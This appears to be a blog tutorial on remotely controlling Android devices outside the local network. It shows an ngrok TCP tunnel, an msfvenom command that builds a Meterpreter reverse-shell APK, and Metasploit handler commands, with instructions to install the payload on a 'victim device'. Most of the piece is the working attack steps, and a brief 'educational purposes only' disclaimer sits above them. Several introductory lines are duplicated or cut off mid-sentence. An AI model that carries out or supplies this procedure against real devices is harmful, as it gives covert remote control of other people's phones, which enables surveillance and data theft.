Remotely Control Out Of LAN (Local Area Network) Devices With Metasploit And Ngrok
Hey guys, we are back with a simple tutorial to hack by using Tool
after getting a lot of requests from our users, we decided to post this article about how to hack with
We have already posted an article about how to use and Installation of some Hacking Tools, if you have missed that article then
You Can Read It here:
after getting a lot of requests from our users, we decided to post this article about how to hack with
We have already posted an article about how to use and Installation of some Hacking Tools, if you have missed that article then
You Can Read It here:
Warning
This Tutorials is Only For Educational Purposes Only and we are no more responsible for any mistake you do
This Tutorials is Only For Educational Purposes Only and we are no more responsible for any mistake you do
we are come back with another excited practical of exploitation with metasploit-framework in which we show you how to remotely access victim's devices out of local area network or victim on different network or wifi with payload. So excited let's get started.
Requirements:-
Metasploit-Framework
Ngrok
Setup Ngrok For Port Forwarding:-
Download and setup ngrok in your terminal
$ ./ngrok authtoken ****Paste Your Auth Token****
$ ./ngrok tcp 4444 (You can use different port in place of 4444 and tcp)
Once it show you online status interface then it's done. Now open new session and proceed.
Generating Payload:-
$ msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=15048(Use Your given Port in my case 15048) R > Payload.apk
Now wait unitl it generate payload for you. Once it done now you can install payload in victim device and exploit with given commands.
Exploitation:-
$ msfconsole
$ use mulit/handler
$ set payload android/meterpreter/reverse_tcp
$ set lhost 0.0.0.0
$ set lport 4444 (Type your port in my case am used 4444)
$ exploit
Now it works out of LAN successfully.
Comments
Post a Comment